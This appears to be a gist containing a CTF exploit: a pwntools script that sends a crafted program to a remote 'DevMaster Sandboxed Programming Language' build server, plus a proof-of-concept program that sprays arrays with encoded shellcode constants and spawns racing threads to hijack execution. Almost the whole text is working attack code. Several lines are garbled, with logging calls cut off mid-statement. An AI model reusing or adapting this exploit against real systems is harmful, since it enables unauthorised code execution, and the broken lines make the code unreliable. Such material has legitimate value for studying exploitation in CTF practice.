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Created August 24, 2020 04:35
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from pwn import *
import sys
# context.log_level = "debug"
copied from
This server builds and runs programs written in the DevMaster Sandboxed Programming Language.
Expected input in the following format:
* execute-binary | 1 byte | If nonzero, built binary is executed. If zero, built binary is instead returned as a response.
* source-size | 4 bytes | The size of the "source" text field, in little-endian bytes.
* source | n bytes | ASCII-encoded source code in the DevMaster Sandboxed Programming Language.
If execute-binary is true and the build succeeds, any additional bytes after this input is streamed to the process during execution.
Output is produced in the following format:
* build-success | 1 byte | Nonzero if the build succeeded, zero if the build failed.
* response-size | 4 bytes | The size of the "response" field, in little-endian bytes.
* response | n bytes | If build-success is 0, the output of the build. If build-success is 1 and execute-binary was nonzero, the built ELF binary. If build-success is nonzero and execute-binary was nonzero, this field is empty.
If build-success and execute-binary are nonzero, any output from program execution is streamed from the process after this output.
r = remote("", 1337)
payload = ""
simp_code = open("poc.simp", "r").read()
# if 0, return binary
if len(sys.argv) == 1:
payload += p8(1)
payload += p8(0)
payload += p32(len(simp_code))
payload += simp_code
build_success = ord(r.recvn(1))"build-success = %d" % build_success)
if build_success == 0:"something is wrong...")
# if execute-binary is non-zero, response-size is zero
response_sz = u32(r.recvn(4))"response-size = %d" % response_sz)
if response_sz == 0:
print r.recvall()
open("output", "wb").write(r.recvn(response_sz))
context.log_level = "debug"
sc_addr = int(r.recvuntil(">(").split(">")[0][4:], 16)"sc = 0x%x" % sc_addr)
r.sendafter("0, 0, 0])", p64(sc_addr))
print r.recvuntil("}")
def void t_func(string arg, array<uint64, 1024> aarr1, uint64 val) {
int32 i = 0;
while(i < 1024) {
aarr1[i] = val;
i = i + 1;
aarr1[0] = 72340172838123592;
aarr1[1] = 7434932503368958209;
aarr1[2] = 302101819166187629;
aarr1[3] = 3595993771285834276;
aarr1[4] = 18446667387153390070;
aarr1[5] = 6352444675345383423;
aarr1[6] = 10416831502663745898;
def int32 main() {
string message = "Hello, World!\n";
ref<array<uint64, 1024>> arr = new<array<uint64, 1024>>();
uint64 val = bytes64(read(8));
int32 i = 0;
while(i < 1024) {
deref(arr)[i] = val;
i = i + 1;
deref(arr)[0] = 72340172838123592;
deref(arr)[1] = 7434932503368958209;
deref(arr)[2] = 302101819166187629;
deref(arr)[3] = 3595993771285834276;
deref(arr)[4] = 18446667387153390070;
deref(arr)[5] = 6352444675345383423;
deref(arr)[6] = 10416831502663745898;
thread t1 = make_thread(t_func, message, deref(arr), val);
thread t2 = make_thread(t_func, message, deref(arr), val);
thread t3 = make_thread(t_func, message, deref(arr), val);
return 0;
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